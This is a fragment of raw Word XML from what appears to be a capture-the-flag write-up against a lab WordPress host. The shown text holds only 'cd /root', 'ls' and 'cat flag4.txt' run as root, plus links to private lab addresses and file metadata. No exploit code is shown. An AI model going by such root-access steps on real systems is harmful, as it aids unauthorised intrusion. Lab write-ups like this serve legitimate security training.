    </w:p>
    <w:p w14:paraId="6E00085B" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D72B0" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40358581" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518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tab/>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F8F36" w14:textId="77777777" w:rsidR="00057518" w:rsidRDefault="00057518" w:rsidP="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4515F" w14:textId="18B4204F" w:rsidR="00057518" w:rsidRDefault="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE9BAF" w14:textId="2DA76676" w:rsidR="00057518" w:rsidRDefault="00057518">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A128733" wp14:editId="03B610D1">
            <wp:extent cx="5097640" cy="500062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7026" cy="502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75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29F"/>
    <w:rsid w:val="00057518"/>
    <w:rsid w:val="001052F9"/>
    <w:rsid w:val="00136B3E"/>
    <w:rsid w:val="00182684"/>
    <w:rsid w:val="002B4B9D"/>
    <w:rsid w:val="0039191C"/>
    <w:rsid w:val="003B6143"/>
    <w:rsid w:val="004E0F15"/>
    <w:rsid w:val="005F4DE8"/>
    <w:rsid w:val="006543A0"/>
    <w:rsid w:val="007A3F3B"/>
    <w:rsid w:val="00866A3E"/>
    <w:rsid w:val="008B7506"/>
    <w:rsid w:val="008E37B0"/>
    <w:rsid w:val="00903E63"/>
    <w:rsid w:val="009E79E8"/>
    <w:rsid w:val="00A2050B"/>
    <w:rsid w:val="00A223D4"/>
    <w:rsid w:val="00A25EAE"/>
    <w:rsid w:val="00A60CD6"/>
    <w:rsid w:val="00C35468"/>
    <w:rsid w:val="00C52D5D"/>
    <w:rsid w:val="00CC529F"/>
    <w:rsid w:val="00DA1DC4"/>
    <w:rsid w:val="00EA1056"/>
    <w:rsid w:val="00EE7EF7"/>
    <w:rsid w:val="00FC1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D1B15"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F0BEA404-4D87-400D-ABB6-5F1FDAA3F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0C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0C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mailto:steven@192.168.1.110" TargetMode="External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hyperlink" Target="http://192.168.1.115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hyperlink" Target="http://192.168.1.110/wordpress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192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png" TargetMode="Externa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4305</TotalTime>
  <Pages>15</Pages>
  <Words>564</Words>
  <Characters>3220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Gould</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Gould</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-11T15:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T14:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>